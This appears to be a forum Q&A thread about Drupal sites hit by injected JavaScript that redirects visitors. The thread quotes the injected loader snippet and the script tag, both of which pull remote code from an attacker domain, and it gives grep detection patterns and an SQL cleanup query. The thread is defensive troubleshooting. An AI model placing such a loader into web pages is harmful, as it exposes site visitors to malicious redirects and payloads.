Sohel Pathan
Sohel Pathan

Reputation: 365

Javascript injected in all drupal websites of a server

From last few days, my sites have been come across malicious attack. When I open a site http://site1.com it first goes to redirected on another page (possibly an ad page).

In chrome browser when I try to diagnose the problem through console (F12), I found it shows me a strange error. "Failed to load resource: net::ERR_NAME_NOT_RESOLVED" and url is - https://js.localstorage.tk/s.js?crt=new. In further investigation I found that it injects following script on every page load of every website on that particular server. (Not one site but 3-4 sites have been infected with same attack on same server).

var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?crt=new"; document.head.appendChild(z);

I have also tried to find this code snippet in hosted file systems of infected websites, using various "grep" commands as below but i couldn't found anything.

 grep -rwn /var/www/ -e 'js.localstorage.tk'
 grep -rwn /var/www/ -e 'var z'
 grep -rwn /var/www/ -e 'z.type'
 grep -rwn /var/www/ -e 'z.src'
 grep -rwn /var/www/ -e 'crt=new'

But no clue of malicious injected script. Same result in DB investigation.

When I access my site through LAN without internet then the same error with some weird URL :

GET https://js.localstorage.tk/s.js?crt=new net::ERR_NAME_NOT_RESOLVED debugger:///VM359:1

And worst thing is that now google has listed my sites into "Dangerous" list and it show warning "Deceptive site ahead" with dark red background.

Any help...!!!

Upvotes: 1

Views: 1384

Answers (2)

Gardonyi Peter
Gardonyi Peter

Reputation: 21

You should check your DB.

I have the same problem and found the script in every row of field_data_body table in body_summary column.

Perform a on all tables with the following query: %js.localstorage.tk%

Here is a removal query:

UPDATE field_data_body SET `body_summary`=REPLACE(`body_summary`,"<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>","");

Upvotes: 1

sadadd
sadadd

Reputation: 36

find code with this command

grep -rwn /var/www/ -e 'eval(String.fromCharCode'

Upvotes: 2

Related Questions